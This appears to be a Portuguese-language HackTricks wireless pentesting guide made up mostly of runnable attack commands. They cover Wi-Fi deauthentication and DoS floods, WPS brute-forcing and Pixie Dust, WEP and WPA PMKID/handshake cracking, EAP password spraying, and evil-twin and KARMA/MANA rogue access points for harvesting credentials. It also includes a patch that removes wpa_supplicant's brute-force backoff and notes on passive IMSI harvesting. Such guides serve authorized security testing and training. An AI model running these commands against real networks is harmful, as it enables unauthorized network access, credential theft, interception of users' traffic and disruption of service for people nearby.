Pentesting Wifi

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

Comandos básicos de Wifi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Ferramentas

Hijacker & NexMon (Wi-Fi interno do Android)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Executar airgeddon com docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Fonte: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Ele pode realizar ataques Evil Twin, KARMA e Known Beacons e então usar um modelo de phishing para conseguir obter a senha real da network ou capturar credentials de social network.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It will automatically:

• Colocar a interface em monitor mode
• Fazer scan por redes possíveis - E permitir que você selecione a(s) vítima(s)
• Se WEP - Lançar ataques WEP
• Se WPA-PSK
• Se WPS: Pixie dust attack e brute-force attack (cuidado: o brute-force attack pode levar muito tempo). Observe que ele não tenta null PIN ou database/generated PINs.
• Tentar capturar o PMKID do AP para crackear
• Tentar desautenticar clientes do AP para capturar um handshake
• Se PMKID ou handshake, tentar bruteforce usando top5000 passwords.

Attacks Summary

• DoS
• Deauthentication/disassociation – Desconectar todos (ou um ESSID/Client específico)
• Random fake APs – Ocultar redes, possível travamento de scanners
• Overload AP – Tentar derrubar o AP (geralmente não muito útil)
• WIDS – Testar o IDS
• TKIP, EAPOL – Alguns ataques específicos para DoS em alguns APs
• Cracking
• Crack WEP (várias ferramentas e métodos)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Útil para capturar captive portal creds e/ou realizar LAN attacks
• WPA-PSK Evil Twin – Útil para network attacks se você souber a password
• WPA-MGT – Útil para capturar company credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Útil para capturar captive portal creds e/ou realizar LAN attacks
• + WPA – Útil para capturar WPA handshakes

Open / OWE networks quick notes

• Passive capture on open SSIDs still works with monitor mode and tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) realiza uma troca de chaves por estação (no PSK), então os frames no ar são criptografados mesmo em SSIDs “open”. Sendo baseado em WPA3, também aplica 802.11w PMF, que bloqueia frames de deauth/disassoc forjados.
• OWE não autentica joiners: qualquer um pode associar, então verifique client isolation em vez de confiar em afirmações de marketing. Sem isolamento, ARP spoofing ou responder-style poisoning no L2 local ainda funciona.
• Evil Twin continua viável em SSIDs open/OWE apresentando um sinal mais forte; o PMF apenas remove o atalho de deauth. Se as vítimas aceitarem um certificado TLS forjado, o MitM HTTP(S) completo é restabelecido.
• Broadcast poisoning em guest Wi-Fi open facilmente gera creds/hashes (LLMNR/NBT-NS/mDNS). See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Descrição retirada de aqui:.

Deauthentication attacks, um método prevalente em Wi-Fi hacking, envolvem forjar frames de “management” para desconectar forçosamente dispositivos de uma rede. Esses pacotes não criptografados enganam os clientes, fazendo-os acreditar que vêm da rede legítima, permitindo que atacantes coletem WPA handshakes para cracking ou interrompam persistentemente conexões de rede. Essa tática, alarmante em sua simplicidade, é amplamente usada e tem implicações significativas para a segurança de redes.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 significa deauthentication
• 1 é o número de deauths a enviar (você pode enviar múltiplos se desejar); 0 significa enviá‑los continuamente
• -a 00:14:6C:7E:40:80 é o endereço MAC do ponto de acesso
• -c 00:0F:B5:34:30:30 é o endereço MAC do cliente a ser deauthenticate; se isto for omitido, então é enviada uma broadcast deauthentication (nem sempre funciona)
• ath0 é o nome da interface

Disassociation Packets

Disassociation packets, similar to deauthentication packets, são um tipo de frame de gerenciamento usado em redes Wi‑Fi. Esses pacotes servem para romper a conexão entre um dispositivo (como um laptop ou smartphone) e um ponto de acesso (AP). A principal distinção entre disassociation e deauthentication está nos cenários de uso. Enquanto um AP emite deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, reinício ou realocação, exigindo assim a desconexão de todos os nós conectados.

Este ataque pode ser realizado por mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Mais ataques DOS por mdk4

Em here.

ATTACK MODE b: Beacon Flooding

Envia beacon frames para mostrar fake APs aos clientes. Isso às vezes pode travar network scanners e até drivers!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Enviar authentication frames para todos os Access Points (APs) acessíveis ao alcance pode sobrecarregar esses APs, especialmente quando numerosos clientes estão envolvidos. Esse tráfego intenso pode levar à instabilidade do sistema, fazendo com que alguns APs travem ou até reiniciem.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) verifica se um SSID é exibido corretamente e confirma o alcance do AP. Essa técnica, juntamente com bruteforcing hidden SSIDs com ou sem uma wordlist, auxilia na identificação e no acesso a redes ocultas.

ATTACK MODE m: Michael Countermeasures Exploitation

Enviar packets aleatórios ou duplicados para diferentes filas de QoS pode disparar Michael Countermeasures em TKIP APs, levando ao desligamento do AP por um minuto. Este método é uma tática eficiente de DoS (Denial of Service).

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Inundar um AP com EAPOL Start frames cria fake sessions, sobrecarregando o AP e bloqueando clientes legítimos. Alternativamente, injetar fake EAPOL Logoff messages desconecta clientes à força; ambos os métodos interrompem efetivamente o serviço de rede.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Ataques para redes mesh IEEE 802.11s

Vários ataques ao gerenciamento de links e ao roteamento em redes mesh.

ATTACK MODE w: Confusão do WIDS

Conectar clientes a múltiplos nós WDS ou rogue APs falsos pode manipular Sistemas de Detecção e Prevenção de Intrusões, gerando confusão e potencial abuso do sistema.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

Uma Packet Fuzzer com diversas fontes de pacotes e um conjunto abrangente de modificadores para manipulação de pacotes.

Airggedon

Airgeddon oferece a maioria dos ataques propostos nos comentários anteriores:

WPS

WPS (Wi‑Fi Protected Setup) simplifica o processo de conectar dispositivos a um roteador, acelerando e facilitando a configuração para redes criptografadas com WPA ou WPA2 Personal. Não é eficaz contra a segurança WEP, que é facilmente comprometida. O WPS usa um PIN de 8 dígitos, validado em duas metades, tornando-o suscetível a ataques de brute-force devido ao número limitado de combinações (11.000 possibilidades).

WPS Bruteforce

Existem 2 ferramentas principais para realizar essa ação: Reaver e Bully.

• Reaver foi projetado para ser um ataque robusto e prático contra WPS, e foi testado em uma ampla variedade de access points e implementações WPS.
• Bully é uma nova implementação do ataque de brute force ao WPS, escrito em C. Ele tem várias vantagens sobre o código original do reaver: menos dependências, melhor desempenho de memória e CPU, tratamento correto de endianness e um conjunto de opções mais robusto.

O ataque explora a vulnerabilidade do WPS PIN, particularmente a exposição dos primeiros quatro dígitos e o papel do último dígito como checksum, facilitando o ataque de brute-force. Contudo, defesas contra brute-force, como bloqueio de MAC addresses de atacantes agressivos, exigem MAC address rotation para continuar o ataque.

Ao obter o WPS PIN com ferramentas como Bully ou Reaver, o atacante pode deduzir o PSK do WPA/WPA2, garantindo acesso persistente à rede.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Esta abordagem refinada tem como alvo os WPS PINs usando vulnerabilidades conhecidas:

1. PINs pré-descobertos: Utilize um banco de dados de PINs conhecidos vinculados a fabricantes específicos conhecidos por usar WPS PINs uniformes. Esse banco de dados correlaciona os três primeiros octetos dos MAC-addresses com os PINs prováveis desses fabricantes.
2. Algoritmos de geração de PINs: Aproveite algoritmos como ComputePIN e EasyBox, que calculam WPS PINs com base no MAC-address do AP. O algoritmo Arcadyan, adicionalmente, requer um device ID, adicionando uma camada ao processo de geração do PIN.

WPS Pixie Dust attack

Dominique Bongard descobriu uma falha em alguns Access Points (APs) relacionada à criação de códigos secretos, conhecidos como nonces (E-S1 e E-S2). Se esses nonces puderem ser descobertos, o cracking do WPS PIN do AP torna-se fácil. O AP revela o PIN dentro de um código especial (hash) para provar que é legítimo e não um AP falso (rogue). Esses nonces são essencialmente as “chaves” para destrancar o “cofre” que contém o WPS PIN. Mais sobre isso pode ser encontrado here.

Em termos simples, o problema é que alguns APs não usavam chaves suficientemente aleatórias para criptografar o PIN durante o processo de conexão. Isso torna o PIN vulnerável a ser adivinhado a partir de fora da rede (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Se você não quiser colocar o dispositivo em monitor mode, ou se reaver e bully apresentarem algum problema, pode tentar OneShot-C. Esta ferramenta pode executar o Pixie Dust attack sem precisar entrar em monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Alguns sistemas mal projetados até permitem que um Null PIN (um PIN vazio ou inexistente) conceda acesso, o que é bastante incomum. A ferramenta Reaver é capaz de testar essa vulnerabilidade, ao contrário do Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Todos os ataques WPS propostos podem ser facilmente executados usando airgeddon.

• 5 e 6 permitem que você tente seu PIN personalizado (se tiver algum)
• 7 e 8 executam o Pixie Dust attack
• 13 permite testar o NULL PIN
• 11 e 12 irão recolher os PINs relacionados ao AP selecionado a partir de bases de dados disponíveis e gerar possíveis PINs usando: ComputePIN, EasyBox e, opcionalmente, Arcadyan (recomendado, por que não?)
• 9 e 10 vão testar todos os PINs possíveis

WEP

Por que ele falha

• RC4 seed é apenas IV (24 bits) + shared key. O IV está em cleartext, é pequeno (2^24) e se repete rapidamente, então ciphertexts com o mesmo IV reutilizam o keystream.
• XORing two ciphertexts with the same keystream leaks PlaintextA ⊕ PlaintextB; predictable headers + RC4 KSA biases (FMS) permitem “votar” bytes da chave. PTW otimiza isso usando ARP traffic para reduzir os requisitos para dezenas de milhares de packets em vez de milhões.
• Integridade é apenas CRC32 (linear/unkeyed), então um atacante pode flipar bits e recomputar CRC32 sem a chave → packet forgery/replay/ARP injection enquanto espera pelos IVs.

A quebra prática é determinística:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon ainda inclui um fluxo de trabalho WEP “All-in-One” se você preferir uma UI guiada.

WPA/WPA2 PSK

PMKID

Em 2018, hashcat revealed um novo método de ataque, único porque precisa apenas de um único pacote e não requer que quaisquer clientes estejam conectados ao AP alvo — apenas interação entre o atacante e o AP.

Muitos roteadores modernos adicionam um campo opcional ao primeiro quadro EAPOL durante a associação, conhecido como Robust Security Network. Isso inclui o PMKID.

Como o post original explica, o PMKID é criado usando dados conhecidos:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Dado que o “PMK Name” é constante, sabemos o BSSID do AP e da station, e o PMK é idêntico ao do full 4-way handshake, o hashcat pode usar essa informação para crackar o PSK e recuperar a passphrase!

Para gather essa informação e bruteforce localmente a senha você pode fazer:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Os PMKIDs captured serão exibidos no console e também salvos dentro _ /tmp/attack.pcap_
Agora, converta a captura para o formato hashcat/john e crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Observe que o formato de um hash correto contém 4 partes, como: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Se o seu contiver somente 3 partes, então é inválido (a captura PMKID não foi válida).

Note que hcxdumptool também captura handshakes (algo assim aparecerá: MP:M1M2 RC:63258 EAPOLTIME:17091). Você pode transformar os handshakes para o formato hashcat/john usando cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Percebi que alguns handshakes capturados com esta ferramenta não puderam ser cracked mesmo sabendo a senha correta. Recomendo capturar handshakes também pela forma tradicional, se possível, ou capturar vários deles usando esta ferramenta.

Captura de handshake

Um ataque a redes WPA/WPA2 pode ser executado capturando um handshake e tentando crack a senha offline. Esse processo envolve monitorar a comunicação de uma rede específica e o BSSID em um channel particular. Aqui está um guia simplificado:

1. Identifique o BSSID, o channel, e um connected client da rede alvo.
2. Use airodump-ng para monitorar o tráfego da rede no channel e BSSID especificados, na esperança de capturar um handshake. O comando ficará assim:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Para aumentar a chance de capturar um handshake, desconecte momentaneamente o cliente da rede para forçar uma re-autenticação. Isso pode ser feito usando o comando aireplay-ng, que envia deauthentication packets ao cliente:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Observe que, como o client foi deauthenticated, ele pode tentar conectar-se a um AP diferente ou, em outros casos, a uma network diferente.

Quando no airodump-ng aparecerem informações de handshake, isso significa que o handshake foi capturado e você pode parar de listening:

Depois que o handshake for capturado, você pode crack ele com aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Verificar se há handshake no arquivo

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Se esta ferramenta encontrar um handshake incompleto de um ESSID antes do handshake completo, ela não detectará o válido.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Adivinhação online de PSK mais rápida via wpa_supplicant ctrl socket (no clients/PMKID)

Quando não há clients por perto e o AP recusa PMKID, você pode iterar PSKs online sem respawning de supplicants:

• Aplique um patch em wpa_supplicant.c para forçar dur = 0; na lógica de backoff de falha de autenticação (em torno de ssid->auth_failures), desabilitando efetivamente o temporizador temporary-disable.
• Execute um único daemon com um control socket:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Controle-o via a interface de controle, reutilizando o mesmo scan e network:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

Um pequeno loop em Python que lê eventos de socket (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) pode testar ~100 tentativas em ~5 minutos sem a sobrecarga de scan. Ainda é ruidoso e detectável, mas evita reinicializações de processo por tentativa e atrasos de backoff.

WPA Enterprise (MGT)

In enterprise WiFi setups, you’ll encounter various authentication methods, each providing different security levels and management features. When you use tools like airodump-ng to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Este método suporta hardware tokens e one-time passwords dentro de EAP-PEAP. Ao contrário do MSCHAPv2, ele não utiliza peer challenge e envia passwords em plaintext para o access point, representando um risco para downgrade attacks.

2. EAP-MD5 (Message Digest 5):

• Envolve o envio do hash MD5 do password a partir do client. Não é recomendado devido à vulnerabilidade a dictionary attacks, falta de server authentication e incapacidade de gerar WEP keys específicas por sessão.

3. EAP-TLS (Transport Layer Security):

• Utiliza certificados client-side e server-side para authentication e pode gerar dinamicamente WEP keys por usuário e por sessão para proteger as comunicações.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Fornece mutual authentication através de um TLS tunnel encriptado, além de um método para derivar WEP keys dinâmicas por usuário e por sessão. Requer apenas certificados server-side, com clients usando credentials.

5. PEAP (Protected Extensible Authentication Protocol):

• Funciona de forma similar ao EAP criando um TLS tunnel para comunicação protegida. Permite o uso de protocolos de authentication mais fracos sobre o EAP devido à proteção oferecida pelo tunnel.
• PEAP-MSCHAPv2: Frequentemente referido como PEAP, combina o vulnerável mecanismo challenge/response do MSCHAPv2 com um TLS tunnel protetor.
• PEAP-EAP-TLS (or PEAP-TLS): Similar ao EAP-TLS, mas inicia um TLS tunnel antes de trocar certificados, oferecendo uma camada adicional de segurança.

Você pode encontrar mais informações sobre esses métodos de autenticação here and here.

Captura de username

Lendo https://tools.ietf.org/html/rfc3748#page-27 parece que se você estiver usando EAP as “Identity” messages devem ser supported, e o username será enviado em claro nas “Response Identity” messages.

Mesmo usando um dos métodos de autenticação mais seguros: PEAP-EAP-TLS, é possível capturar o username enviado no EAP protocol. Para isso, capture uma comunicação de authentication (start airodump-ng inside a channel and wireshark in the same interface) e filtre os pacotes poreapol.
Inside the “Response, Identity” packet, the username of the client will appear.

Identidades Anônimas

Identity hiding é suportado por ambos EAP-PEAP e EAP-TTLS. No contexto de uma rede WiFi, um EAP-Identity request é tipicamente iniciado pelo access point (AP) durante o processo de association. Para garantir a proteção do anonimato do usuário, a resposta do EAP client no dispositivo do usuário contém apenas a informação essencial requerida para o RADIUS server inicial processar o pedido. Esse conceito é ilustrado através dos seguintes cenários:

• EAP-Identity = anonymous
• Nesse cenário, todos os usuários empregam o pseudônimo “anonymous” como seu identificador de usuário. O RADIUS server inicial funciona como um EAP-PEAP ou EAP-TTLS server, responsável por gerenciar o lado server do protocolo PEAP ou TTLS. O método de autenticação inner (protected) é então tratado localmente ou delegado a um RADIUS server remoto (home).
• EAP-Identity = anonymous@realm_x
• Nesta situação, usuários de diferentes realms ocultam suas identities enquanto indicam seus respectivos realms. Isso permite que o RADIUS server inicial proxy os pedidos EAP-PEAP ou EAP-TTLS para RADIUS servers em seus home realms, que atuam como o PEAP ou TTLS server. O RADIUS server inicial opera exclusivamente como um RADIUS relay node.
• Alternativamente, o RADIUS server inicial pode funcionar como o EAP-PEAP ou EAP-TTLS server e ou tratar o método de autenticação protegido localmente ou encaminhá-lo para outro server. Esta opção facilita a configuração de políticas distintas para vários realms.

No EAP-PEAP, uma vez que o TLS tunnel é estabelecido entre o PEAP server e o PEAP client, o PEAP server inicia um EAP-Identity request e o transmite através do TLS tunnel. O client responde a esse segundo EAP-Identity request enviando uma EAP-Identity response contendo a identidade real do usuário através do tunnel encriptado. Essa abordagem previne efetivamente a revelação da identidade real do usuário a qualquer pessoa eavesdropping no tráfego 802.11.

EAP-TTLS segue um procedimento ligeiramente diferente. Com EAP-TTLS, o client tipicamente autentica usando PAP ou CHAP, protegido pelo TLS tunnel. Neste caso, o client inclui um User-Name attribute e ou um Password ou CHAP-Password attribute na mensagem TLS inicial enviada após o estabelecimento do tunnel.

Independentemente do protocolo escolhido, o PEAP/TTLS server obtém conhecimento da identidade real do usuário após o TLS tunnel ter sido estabelecido. A identidade real pode ser representada como user@realm ou simplesmente user. Se o PEAP/TTLS server também for responsável por autenticar o usuário, ele agora possui a identidade do usuário e prossegue com o método de autenticação protegido pelo TLS tunnel. Alternativamente, o PEAP/TTLS server pode encaminhar um novo pedido RADIUS para o home RADIUS server do usuário. Esse novo RADIUS request omite a camada PEAP ou TTLS do protocolo. Nos casos em que o método de autenticação protegido é EAP, as inner EAP messages são transmitidas ao home RADIUS server sem o wrapper EAP-PEAP ou EAP-TTLS. O User-Name attribute da mensagem RADIUS de saída contém a identidade real do usuário, substituindo o User-Name anonymous do RADIUS request de entrada. Quando o método de autenticação protegido é PAP ou CHAP (suportado apenas pelo TTLS), o User-Name e outros atributos de autenticação extraídos do payload TLS são substituídos na mensagem RADIUS de saída, deslocando o User-Name anonymous e os TTLS EAP-Message attributes encontrados no RADIUS request de entrada.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Notas:
- Funciona antes de qualquer túnel TLS se a implantação usar bare EAP‑SIM/AKA sem identidade/pseudônimos protegidos.
- O valor exposto é um identificador permanente vinculado ao SIM do assinante; a colheita permite rastreamento de longo prazo e abusos subsequentes em telecom.

Impacto
- Privacidade: rastreamento persistente de usuário/dispositivo a partir de capturas passivas de Wi‑Fi em locais públicos.
- Base para abuso em telecom: com o IMSI, um atacante com acesso SS7/Diameter pode consultar localização ou tentar interceptação de chamadas/SMS e roubo de MFA.

Mitigações / o que procurar
- Verifique que os clientes usam identidades externas anônimas (pseudônimos) para EAP‑SIM/AKA conforme a orientação 3GPP (por exemplo, 3GPP TS 33.402).
- Prefira tunelizar a fase de identidade (por exemplo, EAP‑TTLS/PEAP carregando EAP‑SIM/AKA interno) para que o IMSI nunca seja enviado em claro.
- Capturas de pacotes da associação/autenticação nunca devem revelar um IMSI bruto em EAP-Response/Identity.

Related: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** de **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5